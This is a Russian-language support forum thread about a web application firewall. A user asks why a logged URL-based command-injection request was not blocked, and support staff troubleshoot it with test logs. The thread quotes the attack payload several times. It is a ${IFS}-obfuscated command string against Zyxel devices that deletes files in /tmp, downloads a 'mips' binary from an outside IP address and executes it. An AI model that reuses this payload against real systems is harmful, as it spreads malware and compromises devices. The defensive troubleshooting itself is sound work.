Пропуск запроса вида /bin

U

untitledds

New member
Здравствуйте, waf пропускает запрос вида в url:
/bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://103.110.33.164/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Click to expand...
хотя правила есть для таких запросов.
При этом, строка :
/bin/zhttpd/$%7BIFS%7Dcd$%7BIFS%7D/tmp;$%7BIFS%7Drm$%7BIFS%7D-rf$%7BIFS%7D*;$%7BIFS%7Dwget$%7BIFS%7Dhttp://103.110.33.164/mips;$%7BIFS%7Dchmod$%7BIFS%7D777$%7BIFS%7Dmips;$%7BIFS%7D./mips$%7BIFS%7Dzyxel.selfrep;
Click to expand...
блокируется правилами 2926 и 1879
 
Last edited:
untitledds said:
Здравствуйте, waf пропускает запрос вида в url:

хотя правила есть для таких запросов.
При этом, строка :

блокируется правилами 2926 и 1879
Click to expand...
Добрый день!

Проверили Ваш пейлод на некоммерческой версии. Запрос блокируется сигнатурами, даже если в URL находится:

Bash: 
/bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://103.110.33.164/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;

Если у вас запрос с таким пейлодом не блокируется, то пришлите нам, пожалуйста, соответствующую запись из access.log веб-сервера. Для примера прикладываем запись, которую мы получаем при отправке через cURL и при обращении через браузер с одним и тем же пейлодом:

cURL:
Bash: 
"GET /bin/zhttpd/$IFScd$IFS/tmp;$IFSrm$IFS-rf$IFS*;$IFSwget$IFShttp://103.110.33.164/mips;$IFSchmod$IFS777$IFSmips;$IFS./mips$IFSzyxel.selfrep; HTTP/1.1" 403 153 "-" "curl/7.74.0" "-"

Браузер:
Bash: 
"GET /bin/zhttpd/$%7BIFS%7Dcd$%7BIFS%7D/tmp;$%7BIFS%7Drm$%7BIFS%7D-rf$%7BIFS%7D*;$%7BIFS%7Dwget$%7BIFS%7Dhttp://103.110.33.164/mips;$%7BIFS%7Dchmod$%7BIFS%7D777$%7BIFS%7Dmips;$%7BIFS%7D./mips$%7BIFS%7Dzyxel.selfrep; HTTP/1.1" 403 153 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0" "-"
 
Добрый день!
support said:
Если у вас запрос с таким пейлодом не блокируется, то пришлите нам, пожалуйста, соответствующую запись из access.log веб-сервера.
Click to expand...
В access.log запросы именно такого вида:
116.36.163.125 - - [24/Sep/2023:16:55:15 +0300] "GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://103.131.57.59/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;" 400 248 "-" "-"
Click to expand...
 
untitledds said:
Добрый день!

В access.log запросы именно такого вида:
Click to expand...
Уточните, пожалуйста, каким образом отправляете запрос к веб-приложению?
 
Это не я отправляю, это реальные логи с сервера. Как повторить не понятно, возможно специально сформированным запросом (эксплойт)
 
untitledds said:
Это не я отправляю, это реальные логи с сервера. Как повторить не понятно, возможно специально сформированным запросом (эксплойт)
Click to expand...
В данном случае по логу мы видим код ответа 400. Уточните, пожалуйста, код ответа 400 возвращается от веб-сервера защищаемого веб-приложения или это ответ от Nginx самой фильтрующей ноды?

В случае, если это ответ Nginx фильтрующей ноды, то запрос не попадает в обработку динамическим модулем т.к. отклоняется самим Nginx на этапе парсинга запроса.
 
support said:
В данном случае по логу мы видим код ответа 400. Уточните, пожалуйста, код ответа 400 возвращается от веб-сервера защищаемого веб-приложения или это ответ от Nginx самой фильтрующей ноды?

В случае, если это ответ Nginx фильтрующей ноды, то запрос не попадает в обработку динамическим модулем т.к. отклоняется самим Nginx на этапе парсинга запроса.
Click to expand...
Да, это ответ фильтрующей ноды. Ответ понятен, спасибо!
 
You must log in or register to reply here.
Back
Top